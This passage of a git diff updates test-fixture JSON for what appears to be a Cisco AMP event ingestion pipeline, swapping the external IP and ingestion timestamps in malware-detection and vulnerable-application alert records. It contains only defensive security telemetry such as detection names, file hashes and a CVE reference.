Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1853,7 +1763,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1903,7 +1813,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1916,8 +1826,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070166224Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898131700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1939,7 +1849,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1989,7 +1899,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2006,8 +1916,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070168263Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898136400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2029,7 +1939,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2079,7 +1989,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2096,8 +2006,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070170310Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898142300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2119,7 +2029,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2169,7 +2079,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2182,8 +2092,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070172324Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898148100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2205,7 +2115,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2255,7 +2165,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2268,8 +2178,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070174535Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898152600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2291,7 +2201,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2338,7 +2248,7 @@ "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2348,8 +2258,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-30T00:14:16.070176587Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}", + "ingested": "2021-12-09T13:35:32.898157500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}", "code": "1107296279", "kind": "alert", "start": "2021-01-15T10:20:00.000Z", @@ -2370,7 +2280,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2435,7 +2345,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2452,8 +2362,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070178610Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898162800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2475,7 +2385,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2525,7 +2435,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2538,8 +2448,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070180588Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat 